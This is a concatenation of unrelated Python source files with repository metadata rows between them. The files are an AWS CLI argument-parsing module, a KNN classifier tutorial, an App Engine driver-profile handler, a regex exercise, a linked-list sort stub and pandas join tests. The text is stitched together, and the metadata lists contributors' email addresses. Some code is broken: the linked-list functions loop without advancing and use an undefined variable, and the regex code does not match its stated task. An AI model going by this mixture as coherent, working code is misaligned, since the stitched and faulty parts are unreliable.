hyphens if that's how a user would specify the name.
:type message: string
:param message: The error message to display to the user.
"""
full_message = ("Error parsing parameter '%s': %s" %
(cli_name, message))
super(ParamError, self).__init__(full_message)
self.cli_name = cli_name
self.message = message
class ParamSyntaxError(Exception):
pass
class ParamUnknownKeyError(Exception):
def __init__(self, key, valid_keys):
valid_keys = ', '.join(valid_keys)
full_message = (
"Unknown key '%s', valid choices "
"are: %s" % (key, valid_keys))
super(ParamUnknownKeyError, self).__init__(full_message)
class TooComplexError(Exception):
pass
def unpack_argument(session, service_name, operation_name, cli_argument, value):
"""
Unpack an argument's value from the commandline. This is part one of a two
step process in handling commandline arguments. Emits the load-cli-arg
event with service, operation, and parameter names. Example::
load-cli-arg.ec2.describe-instances.foo
"""
param_name = getattr(cli_argument, 'name', 'anonymous')
value_override = session.emit_first_non_none_response(
'load-cli-arg.%s.%s.%s' % (service_name,
operation_name,
param_name),
param=cli_argument, value=value, service_name=service_name,
operation_name=operation_name)
if value_override is not None:
value = value_override
return value
def uri_param(event_name, param, value, **kwargs):
"""Handler that supports param values from URIs.
"""
cli_argument = param
qualified_param_name = '.'.join(event_name.split('.')[1:])
if qualified_param_name in PARAMFILE_DISABLED or \
getattr(cli_argument, 'no_paramfile', None):
return
else:
return _check_for_uri_param(cli_argument, value)
def _check_for_uri_param(param, value):
if isinstance(value, list) and len(value) == 1:
value = value[0]
try:
return get_paramfile(value)
except ResourceLoadingError as e:
raise ParamError(param.cli_name, six.text_type(e))
def detect_shape_structure(param):
stack = []
return _detect_shape_structure(param, stack)
def _detect_shape_structure(param, stack):
if param.name in stack:
return 'recursive'
else:
stack.append(param.name)
try:
if param.type_name in SCALAR_TYPES:
return 'scalar'
elif param.type_name == 'structure':
sub_types = [_detect_shape_structure(p, stack)
for p in param.members.values()]
# We're distinguishing between structure(scalar)
# and structure(scalars), because for the case of
# a single scalar in a structure we can simplify
# more than a structure(scalars).
if len(sub_types) == 1 and all(p == 'scalar' for p in sub_types):
return 'structure(scalar)'
elif len(sub_types) > 1 and all(p == 'scalar' for p in sub_types):
return 'structure(scalars)'
else:
return 'structure(%s)' % ', '.join(sorted(set(sub_types)))
elif param.type_name == 'list':
return 'list-%s' % _detect_shape_structure(param.member, stack)
elif param.type_name == 'map':
if param.value.type_name in SCALAR_TYPES:
return 'map-scalar'
else:
return 'map-%s' % _detect_shape_structure(param.value, stack)
finally:
stack.pop()
def unpack_cli_arg(cli_argument, value):
"""
Parses and unpacks the encoded string command line parameter
and returns native Python data structures that can be passed
to the Operation.
:type cli_argument: :class:`awscli.arguments.BaseCLIArgument`
:param cli_argument: The CLI argument object.
:param value: The value of the parameter. This can be a number of
different python types (str, list, etc). This is the value as
it's specified on the command line.
:return: The "unpacked" argument than can be sent to the `Operation`
object in python.
"""
return _unpack_cli_arg(cli_argument.argument_model, value,
cli_argument.cli_name)
def _unpack_cli_arg(argument_model, value, cli_name):
if argument_model.type_name in SCALAR_TYPES:
return unpack_scalar_cli_arg(
argument_model, value, cli_name)
elif argument_model.type_name in COMPLEX_TYPES:
return _unpack_complex_cli_arg(
argument_model, value, cli_name)
else:
return six.text_type(value)
def _unpack_complex_cli_arg(argument_model, value, cli_name):
type_name = argument_model.type_name
if type_name == 'structure' or type_name == 'map':
if value.lstrip()[0] == '{':
try:
return json.loads(value, object_pairs_hook=OrderedDict)
except ValueError as e:
raise ParamError(
cli_name, "Invalid JSON: %s\nJSON received: %s"
% (e, value))
raise ParamError(cli_name, "Invalid JSON:\n%s" % value)
elif type_name == 'list':
if isinstance(value, six.string_types):
if value.lstrip()[0] == '[':
return json.loads(value, object_pairs_hook=OrderedDict)
elif isinstance(value, list) and len(value) == 1:
single_value = value[0].strip()
if single_value and single_value[0] == '[':
return json.loads(value[0], object_pairs_hook=OrderedDict)
try:
# There's a couple of cases remaining here.
# 1. It's possible that this is just a list of strings, i.e
# --security-group-ids sg-1 sg-2 sg-3 => ['sg-1', 'sg-2', 'sg-3']
# 2. It's possible this is a list of json objects:
# --filters '{"Name": ..}' '{"Name": ...}'
member_shape_model = argument_model.member
return [_unpack_cli_arg(member_shape_model, v, cli_name)
for v in value]
except (ValueError, TypeError) as e:
# The list params don't have a name/cli_name attached to them
# so they will have bad error messages. We're going to
# attach the parent parameter to this error message to provide
# a more helpful error message.
raise ParamError(cli_name, value[0])
def unpack_scalar_cli_arg(argument_model, value, cli_name=''):
# Note the cli_name is used strictly for error reporting. It's
# not required to use unpack_scalar_cli_arg
if argument_model.type_name == 'integer' or argument_model.type_name == 'long':
return int(value)
elif argument_model.type_name == 'float' or argument_model.type_name == 'double':
# TODO: losing precision on double types
return float(value)
elif argument_model.type_name == 'blob' and \
argument_model.serialization.get('streaming'):
file_path = os.path.expandvars(value)
file_path = os.path.expanduser(file_path)
if not os.path.isfile(file_path):
msg = 'Blob values must be a path to a file.'
raise ParamError(cli_name, msg)
return open(file_path, 'rb')
elif argument_model.type_name == 'boolean':
if isinstance(value, six.string_types) and value.lower() == 'false':
return False
return bool(value)
else:
return value
def _is_complex_shape(model):
if model.type_name not in ['structure', 'list', 'map']:
return False
elif model.type_name == 'list':
if model.member.type_name not in ['structure', 'list', 'map']:
return False
return True
class ParamShorthand(object):
def _uses_old_list_case(self, service_name, operation_name, argument_name):
"""
Determines whether a given operation for a service needs to use the
deprecated shorthand parsing case for lists of structures that only have
a single member.
"""
cases = {
'firehose': {
'put-record-batch': ['records']
},
'workspaces': {
'reboot-workspaces': ['reboot-workspace-requests'],
'rebuild-workspaces': ['rebuild-workspace-requests'],
'terminate-workspaces': ['terminate-workspace-requests']
},
'elb': {
'remove-tags': ['tags'],
'describe-instance-health': ['instances'],
'deregister-instances-from-load-balancer': ['instances'],
'register-instances-with-load-balancer': ['instances']
}
}
cases = cases.get(service_name, {}).get(operation_name, [])
return argument_name in cases
class ParamShorthandParser(ParamShorthand):
def __init__(self):
self._parser = shorthand.ShorthandParser()
self._visitor = shorthand.BackCompatVisitor()
def __call__(self, cli_argument, value, event_name, **kwargs):
"""Attempt to parse shorthand syntax for values.
This is intended to be hooked up as an event handler (hence the
**kwargs). Given ``param`` object and its string ``value``,
figure out if we can parse it. If we can parse it, we return
the parsed value (typically some sort of python dict).
:type cli_argument: :class:`awscli.arguments.BaseCLIArgument`
:param cli_argument: The CLI argument object.
:type param: :class:`botocore.parameters.Parameter`
:param param: The parameter object (includes various metadata
about the parameter).
:type value: str
:param value: The value for the parameter type on the command
line, e.g ``--foo this_value``, value would be ``"this_value"``.
:returns: If we can parse the value we return the parsed value.
If it looks like JSON, we return None (which tells the event
emitter to use the default ``unpack_cli_arg`` provided that
no other event handlers can parsed the value). If we
run into an error parsing the value, a ``ParamError`` will
be raised.
"""
if not self._should_parse_as_shorthand(cli_argument, value):
return
else:
service_name, operation_name = \
find_service_and_method_in_event_name(event_name)
return self._parse_as_shorthand(
cli_argument, value, service_name, operation_name)
def _parse_as_shorthand(self, cli_argument, value, service_name,
operation_name):
try:
LOG.debug("Parsing param %s as shorthand",
cli_argument.cli_name)
handled_value = self._handle_special_cases(
cli_argument, value, service_name, operation_name)
if handled_value is not None:
return handled_value
if isinstance(value, list):
# Because of how we're using argparse, list shapes
# are configured with nargs='+' which means the ``value``
# is given to us "conveniently" as a list. When
# this happens we need to parse each list element
# individually.
parsed = [self._parser.parse(v) for v in value]
self._visitor.visit(parsed, cli_argument.argument_model)
else:
# Otherwise value is just a string.
parsed = self._parser.parse(value)
self._visitor.visit(parsed, cli_argument.argument_model)
except shorthand.ShorthandParseError as e:
raise ParamError(cli_argument.cli_name, str(e))
except (ParamError, ParamUnknownKeyError) as e:
# The shorthand parse methods don't have the cli_name,
# so any ParamError won't have this value. To accomodate
# this, ParamErrors are caught and reraised with the cli_name
# injected.
raise ParamError(cli_argument.cli_name, str(e))
return parsed
def _handle_special_cases(self, cli_argument, value, service_name,
operation_name):
# We need to handle a few special cases that the previous
# parser handled in order to stay backwards compatible.
model = cli_argument.argument_model
if model.type_name == 'list' and \
model.member.type_name == 'structure' and \
len(model.member.members) == 1 and \
self._uses_old_list_case(service_name, operation_name, cli_argument.name):
# First special case is handling a list of structures
# of a single element such as:
#
# --instance-ids id-1 id-2 id-3
#
# gets parsed as:
#
# [{"InstanceId": "id-1"}, {"InstanceId": "id-2"},
# {"InstanceId": "id-3"}]
key_name = list(model.member.members.keys())[0]
new_values = [{key_name: v} for v in value]
return new_values
elif model.type_name == 'structure' and \
len(model.members) == 1 and \
'Value' in model.members and \
model.members['Value'].type_name == 'string' and \
'=' not in value:
# Second special case is where a structure of a single
# value whose member name is "Value" can be specified
# as:
# --instance-terminate-behavior shutdown
#
# gets parsed as:
# {"Value": "shutdown"}
return {'Value': value}
def _should_parse_as_shorthand(self, cli_argument, value):
# We first need to make sure this is a parameter that qualifies
# for simplification. The first short-circuit case is if it looks
# like json we immediately return.
if value and isinstance(value, list):
check_val = value[0]
else:
check_val = value
if isinstance(check_val, six.string_types) and check_val.strip().startswith(
('[', '{')):
LOG.debug("Param %s looks like JSON, not considered for "
"param shorthand.", cli_argument.py_name)
return False
model = cli_argument.argument_model
# The second case is to make sure the argument is sufficiently
# complex, that is, it's base type is a complex type *and*
# if it's a list, then it can't be a list of scalar types.
return _is_complex_shape(model)
class ParamShorthandDocGen(ParamShorthand):
"""Documentation generator for param shorthand syntax."""
_DONT_DOC = object()
_MAX_STACK = 3
def supports_shorthand(self, argument_model):
"""Checks if a CLI argument supports shorthand syntax."""
if argument_model is not None:
return _is_complex_shape(argument_model)
return False
def generate_shorthand_example(self, cli_argument, service_name,
operation_name):
"""Generate documentation for a CLI argument.
:type cli_argument: awscli.arguments.BaseCLIArgument
:param cli_argument: The CLI argument which to generate
documentation for.
:return: Returns either a string or ``None``. If a string
is returned, it is the generated shorthand example.
If a value of ``None`` is returned then this indicates
that no shorthand syntax is available for the provided
``argument_model``.
"""
docstring = self._handle_special_cases(
cli_argument, service_name, operation_name)
if docstring is self._DONT_DOC:
return None
elif docstring:
return docstring
# Otherwise we fall back to the normal docgen for shorthand
# syntax.
stack = []
try:
if cli_argument.argument_model.type_name == 'list':
argument_model = cli_argument.argument_model.member
return self._shorthand_docs(argument_model, stack) + ' ...'
else:
return self._shorthand_docs(cli_argument.argument_model, stack)
except TooComplexError:
return ''
def _handle_special_cases(self, cli_argument, service_name, operation_name):
model = cli_argument.argument_model
if model.type_name == 'list' and \
model.member.type_name == 'structure' and \
len(model.member.members) == 1 and \
self._uses_old_list_case(
service_name, operation_name, cli_argument.name):
member_name = list(model.member.members)[0]
return '%s %s1 %s2 %s3' % (cli_argument.cli_name, member_name,
member_name, member_name)
elif model.type_name == 'structure' and \
len(model.members) == 1 and \
'Value' in model.members and \
model.members['Value'].type_name == 'string':
return self._DONT_DOC
return ''
def _shorthand_docs(self, argument_model, stack):
if len(stack) > self._MAX_STACK:
raise TooComplexError()
if argument_model.type_name == 'structure':
return self._structure_docs(argument_model, stack)
elif argument_model.type_name == 'list':
return self._list_docs(argument_model, stack)
elif argument_model.type_name == 'map':
return self._map_docs(argument_model, stack)
else:
return argument_model.type_name
def _list_docs(self, argument_model, stack):
list_member = argument_model.member
stack.append(list_member.name)
try:
element_docs = self._shorthand_docs(argument_model.member, stack)
finally:
stack.pop()
if list_member.type_name in COMPLEX_TYPES or len(stack) > 1:
return '[%s,%s]' % (element_docs, element_docs)
else:
return '%s,%s' % (element_docs, element_docs)
def _map_docs(self, argument_model, stack):
k = argument_model.key
value_docs = self._shorthand_docs(argument_model.value, stack)
start = 'KeyName1=%s,KeyName2=%s' % (value_docs, value_docs)
if k.enum and not stack:
start += '\n\nWhere valid key names are:\n'
for enum in k.enum:
start += ' %s\n' % enum
elif stack:
start = '{%s}' % start
return start
def _structure_docs(self, argument_model, stack):
parts = []
for name, member_shape in argument_model.members.items():
parts.append(self._member_docs(name, member_shape, stack))
inner_part = ','.join(parts)
if not stack:
return inner_part
return '{%s}' % inner_part
def _member_docs(self, name, shape, stack):
if stack.count(shape.name) > 0:
return '( ... recursive ... )'
stack.append(shape.name)
try:
value_doc = self._shorthand_docs(shape, stack)
finally:
stack.pop()
return '%s=%s' % (name, value_doc)
| [
"ahmed.nadim59@gmail.com"
] | ahmed.nadim59@gmail.com |
b1aa1154a111a4802c9c3e765a47373412a8820d | e52afdf311d9b682fd2edfa2ac131bd83bbe63eb | /Week 2/1-2/knn.py | 54420f3213ba04fc5bc1f0cd9f67980cd384cb91 | [] | no_license | YashwanthMN1/MLEdyoda | cc1185e4618e896764a0b01773a886e49ba9b8e7 | 36a9470729c57c7b6b742bac239e9352f8b2a133 | refs/heads/main | 2023-05-02T11:51:11.801693 | 2021-05-25T13:52:24 | 2021-05-25T13:52:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | # -*- coding: utf-8 -*-
"""
Created on Sun May 9 13:11:46 2021
@author: RISHBANS
"""
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2,3]].values
y = dataset.iloc[:, 4].values
X = X.astype(float)
y = y.astype(float)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
#https://machine-arena.blogspot.com/2020/04/standardscaler-why-fittransform-for.html
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
from sklearn.neighbors import KNeighborsClassifier
classifier = KNeighborsClassifier(n_neighbors = 11)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
cm = confusion_matrix(y_test, y_pred)
print(classification_report(y_test, y_pred, target_names=["yes", "no"]))
print(cm) | [
"rishibansal02@gmail.com"
] | rishibansal02@gmail.com |
2cd3388cd66000a0c14eee28eb57bb0be2033b95 | 6ccd833a6bc8eb2d7cadbaf64ba9351d87c8d1bd | /Handlers/User/Driver.py | db2b2045ecd5c5a92ae606173af52da3ffa7ed4a | [] | no_license | elaineo/barnacle-gae | e00691235160d140fb5004b34988d30811ef4102 | c706683cf448dc5763bb2ce8ea2f5968fcefb375 | refs/heads/master | 2021-01-01T03:47:28.083451 | 2014-11-18T16:47:42 | 2014-11-18T16:47:42 | 59,609,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,078 | py | from Handlers.BaseHandler import *
from Models.ImageModel import *
from Models.User.Account import *
from Models.User.Driver import *
from Handlers.ImageHandler import *
from google.appengine.api import images
from google.appengine.api import users
import logging
import json
class DriverHandler(BaseHandler):
def get(self, key=None):
if not key:
if not self.user_prefs:
self.redirect('/#signin-box')
else:
self.__index()
else:
self.__public(key)
def __index(self):
""" User profile information page """
self.params['createorupdate'] = 'Ready to Drive'
d = Driver.by_userkey(self.user_prefs.key)
self.params['driver'] = True
if d: #existing driver
self.redirect('/route')
return
# else first time being driver
self.params.update(self.user_prefs.params_fill())
self.render('user/forms/filldriver.html', **self.params)
def post(self,action=None):
if not self.user_prefs: # if user is not logged in, redirect to login page, which will redirect back
self.redirect('/#signin-box')
if not action:
self.__profile()
elif action=='photo':
self.__updateimg()
def __updateimg(self):
img = self.request.get("file")
if img:
d = Driver.by_userkey(self.user_prefs.key)
if d.img_id: # existing image
imgstore = ImageStore.get_by_id(d.img_id)
imgstore.update(img)
else: # new image
imgstore = ImageStore.new(img)
imgstore.put()
d.img_id = imgstore.key.id()
d.put()
self.response.headers['Content-Type'] = "application/json"
response = {'status':'ok', 'img_url': d.vehicle_image_url()}
self.write(json.dumps(response))
def __profile(self):
user_prefs = self.user_prefs
user_prefs.first_name = self.request.get("first_name").capitalize()
user_prefs.last_name = self.request.get("last_name")
user_prefs.about = self.request.get("about").replace('\n','')
# validate
location = self.request.get("loc")
if location:
user_prefs.location = location
lat = self.request.get('startlat')
lon = self.request.get('startlon')
if lat and lon:
user_prefs.locpt = ndb.GeoPt(lat,lon)
# image upload
img = self.request.get("file")
if img:
if user_prefs.img_id and user_prefs.img_id>=0: # existing image
imgstore = ImageStore.get_by_id(user_prefs.img_id)
imgstore.update(img)
else: # new image
imgstore = ImageStore.new(img)
imgstore.put()
user_prefs.img_id = imgstore.key.id()
user_prefs.put()
logging.info('User turns into a driver')
self.redirect(user_prefs.profile_url()) | [
"elaine.ou@gmail.com"
] | elaine.ou@gmail.com |
33a624738cbd967c7805dc0b4eae16b9d1fecd8b | ba2dbc19e899faaa17b994a1224e455a3de5b9ad | /01_jump to python/CHAP07/2_Regular_Expression_Practice/q8.py | b16778f7c4b0ffa22de4f29cb9db0a0d2a3226d3 | [] | no_license | xsky21/bigdata2019 | 52d3dc9379a05ba794c53a28284de2168d0fc366 | 19464a6f8862b6e6e3d4e452e0dab85bdd954e40 | refs/heads/master | 2020-04-21T10:56:34.637812 | 2019-04-16T04:16:27 | 2019-04-16T04:16:27 | 169,503,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | # 숫자 0 혹은 알파벳 b 여러 개가 알파벳 a 뒤에오는 문자열을 찾는 파이썬 프로그램을 만들어라
import re
def matching(answer):
p = re.compile("[A-Z][a-z]+")
m = p.search(answer)
print(m)
matching("Azzzzz")
matching("AAaaaa")
matching("AA")
matching("abbb")
#여기선 b가 세 개일 때, b 세개를 출력해주지만. b2개를 출력시키고 싶다면 |를 써야된 | [
"studerande5@gmail.com"
] | studerande5@gmail.com |
445d03f9d2bd2d6754c4785b3446d88b3eddc2f4 | 699a43917ce75b2026a450f67d85731a0f719e01 | /using_python/148_sort_for_listNode.py | 8638dd3b7dfca07b44ec645edaf51ef5fb6dd872 | [] | no_license | wusanshou2017/Leetcode | 96ab81ae38d6e04739c071acfc0a5f46a1c9620b | c4b85ca0e23700b84e4a8a3a426ab634dba0fa88 | refs/heads/master | 2021-11-16T01:18:27.886085 | 2021-10-14T09:54:47 | 2021-10-14T09:54:47 | 107,402,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 768 | py | # Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def sortList(self, head: ListNode) -> ListNode:
if not head.next:
return []
pre = head.val
dummy = head
while dummy.next:
pre = dummy.val
cur = dummy.next.val
if cur < pre:
dummy.val, dummy.next.val = cur, pre
def cut(self, head: ListNode) -> ListNode:
P = head
while (n - 1) and p:
p = p.next
n -= 1
if not p:
return None
ce = p.next
ce.next = None
return ce
def merge(seq1, seq2):
dummy = ListNode()
| [
"252652905@qq.com"
] | 252652905@qq.com |
c2cfa7dbfec1bae1baa2995125e12cacf16d1d4b | fab215713c1b72974a0dc7db73a20e4b5abefe4a | /简明python教程/data-structure/tuple/using_tuple.py | d8e928575aac20cd564ebf278957b92d0c8a5898 | [] | no_license | cwdgit/learn-python | e6774dcea506cfa461bfccc001205bf75a1d126b | c5ba97a917bd2b8d7b767ce704ca5ff441b9dfee | refs/heads/master | 2020-03-24T16:41:47.837953 | 2018-08-23T03:13:04 | 2018-08-23T03:13:04 | 142,832,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | #!/usr/bin/python
#filename: using_tuple.py
zoo=('wolf','elephant','penguin')
print zoo
print 'number of animals in the zoo is', len(zoo)
new_zoo=('monkey','dolphin',zoo)
print 'number of animals in the zoo is ', len(new_zoo)
print 'all animals in new zoo are',new_zoo
print 'animals brought from old zoo are ' ,new_zoo[2]
print 'last animal brought from old zoo is ', new_zoo[2][2]
| [
"you@example.com"
] | you@example.com |
9a85a83020da95c6010ac99ac447040d1f4c93d9 | 1ab7b3f2aa63de8488ce7c466a67d367771aa1f2 | /Ricardo_OS/Python_backend/venv/lib/python3.8/site-packages/pandas/tests/reshape/merge/test_join.py | c33443e24b268ece2c4113b751a2b5b8929e7c99 | [
"MIT"
] | permissive | icl-rocketry/Avionics | 9d39aeb11aba11115826fd73357b415026a7adad | 95b7a061eabd6f2b607fba79e007186030f02720 | refs/heads/master | 2022-07-30T07:54:10.642930 | 2022-07-10T12:19:10 | 2022-07-10T12:19:10 | 216,184,670 | 9 | 1 | MIT | 2022-06-27T10:17:06 | 2019-10-19T09:57:07 | C++ | UTF-8 | Python | false | false | 31,165 | py | import numpy as np
from numpy.random import randn
import pytest
from pandas._libs import join as libjoin
import pandas as pd
from pandas import DataFrame, Index, MultiIndex, Series, concat, merge
import pandas._testing as tm
from pandas.tests.reshape.merge.test_merge import NGROUPS, N, get_test_data
a_ = np.array
class TestJoin:
def setup_method(self, method):
# aggregate multiple columns
self.df = DataFrame(
{
"key1": get_test_data(),
"key2": get_test_data(),
"data1": np.random.randn(N),
"data2": np.random.randn(N),
}
)
# exclude a couple keys for fun
self.df = self.df[self.df["key2"] > 1]
self.df2 = DataFrame(
{
"key1": get_test_data(n=N // 5),
"key2": get_test_data(ngroups=NGROUPS // 2, n=N // 5),
"value": np.random.randn(N // 5),
}
)
index, data = tm.getMixedTypeDict()
self.target = DataFrame(data, index=index)
# Join on string value
self.source = DataFrame(
{"MergedA": data["A"], "MergedD": data["D"]}, index=data["C"]
)
def test_cython_left_outer_join(self):
left = a_([0, 1, 2, 1, 2, 0, 0, 1, 2, 3, 3], dtype=np.int64)
right = a_([1, 1, 0, 4, 2, 2, 1], dtype=np.int64)
max_group = 5
ls, rs = libjoin.left_outer_join(left, right, max_group)
exp_ls = left.argsort(kind="mergesort")
exp_rs = right.argsort(kind="mergesort")
exp_li = a_([0, 1, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 7, 7, 8, 8, 9, 10])
exp_ri = a_([0, 0, 0, 1, 2, 3, 1, 2, 3, 1, 2, 3, 4, 5, 4, 5, 4, 5, -1, -1])
exp_ls = exp_ls.take(exp_li)
exp_ls[exp_li == -1] = -1
exp_rs = exp_rs.take(exp_ri)
exp_rs[exp_ri == -1] = -1
tm.assert_numpy_array_equal(ls, exp_ls, check_dtype=False)
tm.assert_numpy_array_equal(rs, exp_rs, check_dtype=False)
def test_cython_right_outer_join(self):
left = a_([0, 1, 2, 1, 2, 0, 0, 1, 2, 3, 3], dtype=np.int64)
right = a_([1, 1, 0, 4, 2, 2, 1], dtype=np.int64)
max_group = 5
rs, ls = libjoin.left_outer_join(right, left, max_group)
exp_ls = left.argsort(kind="mergesort")
exp_rs = right.argsort(kind="mergesort")
# 0 1 1 1
exp_li = a_(
[
0,
1,
2,
3,
4,
5,
3,
4,
5,
3,
4,
5,
# 2 2 4
6,
7,
8,
6,
7,
8,
-1,
]
)
exp_ri = a_([0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6])
exp_ls = exp_ls.take(exp_li)
exp_ls[exp_li == -1] = -1
exp_rs = exp_rs.take(exp_ri)
exp_rs[exp_ri == -1] = -1
tm.assert_numpy_array_equal(ls, exp_ls, check_dtype=False)
tm.assert_numpy_array_equal(rs, exp_rs, check_dtype=False)
def test_cython_inner_join(self):
left = a_([0, 1, 2, 1, 2, 0, 0, 1, 2, 3, 3], dtype=np.int64)
right = a_([1, 1, 0, 4, 2, 2, 1, 4], dtype=np.int64)
max_group = 5
ls, rs = libjoin.inner_join(left, right, max_group)
exp_ls = left.argsort(kind="mergesort")
exp_rs = right.argsort(kind="mergesort")
exp_li = a_([0, 1, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 7, 7, 8, 8])
exp_ri = a_([0, 0, 0, 1, 2, 3, 1, 2, 3, 1, 2, 3, 4, 5, 4, 5, 4, 5])
exp_ls = exp_ls.take(exp_li)
exp_ls[exp_li == -1] = -1
exp_rs = exp_rs.take(exp_ri)
exp_rs[exp_ri == -1] = -1
tm.assert_numpy_array_equal(ls, exp_ls, check_dtype=False)
tm.assert_numpy_array_equal(rs, exp_rs, check_dtype=False)
def test_left_outer_join(self):
joined_key2 = merge(self.df, self.df2, on="key2")
_check_join(self.df, self.df2, joined_key2, ["key2"], how="left")
joined_both = merge(self.df, self.df2)
_check_join(self.df, self.df2, joined_both, ["key1", "key2"], how="left")
def test_right_outer_join(self):
joined_key2 = merge(self.df, self.df2, on="key2", how="right")
_check_join(self.df, self.df2, joined_key2, ["key2"], how="right")
joined_both = merge(self.df, self.df2, how="right")
_check_join(self.df, self.df2, joined_both, ["key1", "key2"], how="right")
def test_full_outer_join(self):
joined_key2 = merge(self.df, self.df2, on="key2", how="outer")
_check_join(self.df, self.df2, joined_key2, ["key2"], how="outer")
joined_both = merge(self.df, self.df2, how="outer")
_check_join(self.df, self.df2, joined_both, ["key1", "key2"], how="outer")
def test_inner_join(self):
joined_key2 = merge(self.df, self.df2, on="key2", how="inner")
_check_join(self.df, self.df2, joined_key2, ["key2"], how="inner")
joined_both = merge(self.df, self.df2, how="inner")
_check_join(self.df, self.df2, joined_both, ["key1", "key2"], how="inner")
def test_handle_overlap(self):
joined = merge(self.df, self.df2, on="key2", suffixes=(".foo", ".bar"))
assert "key1.foo" in joined
assert "key1.bar" in joined
def test_handle_overlap_arbitrary_key(self):
joined = merge(
self.df,
self.df2,
left_on="key2",
right_on="key1",
suffixes=(".foo", ".bar"),
)
assert "key1.foo" in joined
assert "key2.bar" in joined
def test_join_on(self):
target = self.target
source = self.source
merged = target.join(source, on="C")
tm.assert_series_equal(merged["MergedA"], target["A"], check_names=False)
tm.assert_series_equal(merged["MergedD"], target["D"], check_names=False)
# join with duplicates (fix regression from DataFrame/Matrix merge)
df = DataFrame({"key": ["a", "a", "b", "b", "c"]})
df2 = DataFrame({"value": [0, 1, 2]}, index=["a", "b", "c"])
joined = df.join(df2, on="key")
expected = DataFrame(
{"key": ["a", "a", "b", "b", "c"], "value": [0, 0, 1, 1, 2]}
)
tm.assert_frame_equal(joined, expected)
# Test when some are missing
df_a = DataFrame([[1], [2], [3]], index=["a", "b", "c"], columns=["one"])
df_b = DataFrame([["foo"], ["bar"]], index=[1, 2], columns=["two"])
df_c = DataFrame([[1], [2]], index=[1, 2], columns=["three"])
joined = df_a.join(df_b, on="one")
joined = joined.join(df_c, on="one")
assert np.isnan(joined["two"]["c"])
assert np.isnan(joined["three"]["c"])
# merge column not p resent
with pytest.raises(KeyError, match="^'E'$"):
target.join(source, on="E")
# overlap
source_copy = source.copy()
source_copy["A"] = 0
msg = (
"You are trying to merge on float64 and object columns. If "
"you wish to proceed you should use pd.concat"
)
with pytest.raises(ValueError, match=msg):
target.join(source_copy, on="A")
def test_join_on_fails_with_different_right_index(self):
df = DataFrame(
{"a": np.random.choice(["m", "f"], size=3), "b": np.random.randn(3)}
)
df2 = DataFrame(
{"a": np.random.choice(["m", "f"], size=10), "b": np.random.randn(10)},
index=tm.makeCustomIndex(10, 2),
)
msg = r'len\(left_on\) must equal the number of levels in the index of "right"'
with pytest.raises(ValueError, match=msg):
merge(df, df2, left_on="a", right_index=True)
def test_join_on_fails_with_different_left_index(self):
df = DataFrame(
{"a": np.random.choice(["m", "f"], size=3), "b": np.random.randn(3)},
index=tm.makeCustomIndex(3, 2),
)
df2 = DataFrame(
{"a": np.random.choice(["m", "f"], size=10), "b": np.random.randn(10)}
)
msg = r'len\(right_on\) must equal the number of levels in the index of "left"'
with pytest.raises(ValueError, match=msg):
merge(df, df2, right_on="b", left_index=True)
def test_join_on_fails_with_different_column_counts(self):
df = DataFrame(
{"a": np.random.choice(["m", "f"], size=3), "b": np.random.randn(3)}
)
df2 = DataFrame(
{"a": np.random.choice(["m", "f"], size=10), "b": np.random.randn(10)},
index=tm.makeCustomIndex(10, 2),
)
msg = r"len\(right_on\) must equal len\(left_on\)"
with pytest.raises(ValueError, match=msg):
merge(df, df2, right_on="a", left_on=["a", "b"])
@pytest.mark.parametrize("wrong_type", [2, "str", None, np.array([0, 1])])
def test_join_on_fails_with_wrong_object_type(self, wrong_type):
# GH12081 - original issue
# GH21220 - merging of Series and DataFrame is now allowed
# Edited test to remove the Series object from test parameters
df = DataFrame({"a": [1, 1]})
msg = (
"Can only merge Series or DataFrame objects, "
f"a {type(wrong_type)} was passed"
)
with pytest.raises(TypeError, match=msg):
merge(wrong_type, df, left_on="a", right_on="a")
with pytest.raises(TypeError, match=msg):
merge(df, wrong_type, left_on="a", right_on="a")
def test_join_on_pass_vector(self):
expected = self.target.join(self.source, on="C")
del expected["C"]
join_col = self.target.pop("C")
result = self.target.join(self.source, on=join_col)
tm.assert_frame_equal(result, expected)
def test_join_with_len0(self):
# nothing to merge
merged = self.target.join(self.source.reindex([]), on="C")
for col in self.source:
assert col in merged
assert merged[col].isna().all()
merged2 = self.target.join(self.source.reindex([]), on="C", how="inner")
tm.assert_index_equal(merged2.columns, merged.columns)
assert len(merged2) == 0
def test_join_on_inner(self):
df = DataFrame({"key": ["a", "a", "d", "b", "b", "c"]})
df2 = DataFrame({"value": [0, 1]}, index=["a", "b"])
joined = df.join(df2, on="key", how="inner")
expected = df.join(df2, on="key")
expected = expected[expected["value"].notna()]
tm.assert_series_equal(joined["key"], expected["key"])
tm.assert_series_equal(joined["value"], expected["value"], check_dtype=False)
tm.assert_index_equal(joined.index, expected.index)
def test_join_on_singlekey_list(self):
df = DataFrame({"key": ["a", "a", "b", "b", "c"]})
df2 = DataFrame({"value": [0, 1, 2]}, index=["a", "b", "c"])
# corner cases
joined = df.join(df2, on=["key"])
expected = df.join(df2, on="key")
tm.assert_frame_equal(joined, expected)
def test_join_on_series(self):
result = self.target.join(self.source["MergedA"], on="C")
expected = self.target.join(self.source[["MergedA"]], on="C")
tm.assert_frame_equal(result, expected)
def test_join_on_series_buglet(self):
# GH #638
df = DataFrame({"a": [1, 1]})
ds = Series([2], index=[1], name="b")
result = df.join(ds, on="a")
